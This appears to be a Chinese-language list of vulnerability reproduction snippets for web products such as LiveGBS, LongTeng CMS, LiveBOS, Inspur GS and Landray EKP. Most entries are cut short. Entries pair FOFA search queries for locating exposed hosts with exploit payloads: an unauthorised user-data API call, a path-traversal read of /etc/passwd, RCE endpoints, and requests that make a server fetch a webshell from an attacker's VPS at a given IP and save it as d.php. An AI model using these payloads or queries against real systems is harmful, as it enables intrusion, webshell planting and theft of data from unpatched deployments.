L21-1LiveGBS–InformationLeakage 漏洞描述: LiveGBS部分接口存在未授权访问导致,可以通过组合漏洞修改任意用户密码 fofa语法: icon_hash=“-206100324” 漏洞复现: 敏感信息泄露,获取用户 i d payload: /api/v1/user
L20-4龙腾-CMS-PermissionAC 漏洞复现: webshell:http://ip/d.php payload: GET /api/file/multiDownload?file=http://vpsip:8888/webshell.php&savePath=d.php HTTP/1
L20-3龙腾-CMS-任意文件读取 漏洞复现: payload: GET /api/file/downloadFile?file=././././././././/etc/passwd HTTP/1.1 Host: Cache-Control: max-age=0 Upgrade-Insecur
L20-1龙腾-CMS-SSRF 漏洞复现: https://gitee.com/wanglongcn/ltcms payload: GET /api/file/downloadUrl?file=http://124.221.70.199:8888/c.php HTTP/1.1 Host: Cac
L19-1LiveBOS-灵动业务架构平台-任意文件上传 漏洞描述: LiveBOS灵动业务架构平台,是面向对象的业务支撑平台与建模工具。 在LiveBos的UploadImage.do接口中,发现了一处任意文件上传漏洞,攻击者可利用该漏洞上传任意文件 fofa语法: app=“LiveBOS-框架
L17-2浪潮-GS企业管理软件-RCE 网站图片: fofa语法: body=“/cwbase/web/scripts/jquery.js” || icon_hash=“-1341069524” 漏洞复现: payload: POST /cwbase/service/rps/xtdysrv.asm
L17-1浪潮-GS企业管理软件-RCE 网站图片: fofa语法: body=“/cwbase/web/scripts/jquery.js” || icon_hash=“-1341069524” 漏洞复现: payload: POST /cwbase/gsp/webservice/bizinteg
L16-1livenvr-青柿视频管理系统-PermissionAC 漏洞复现: paylaod1 payload: GET /api/v1/device/channeltree?serial=&pcode HTTP/1.1 Host: payload2 payload: GET /#/scree
L14-1蓝凌-EKP-RCE 漏洞描述: /sys/ui/sys_ui_component/sysUiComponent.do接口存在RCE 漏洞复现: payload: POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1 Host:
L13-1浪潮云-财务系统-RCE 漏洞复现: payload: 7.23日修正:浪潮云官方人员找到棉花糖说明这个系统不属于浪潮云,具体系统还在确认 财务系统路径/cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebser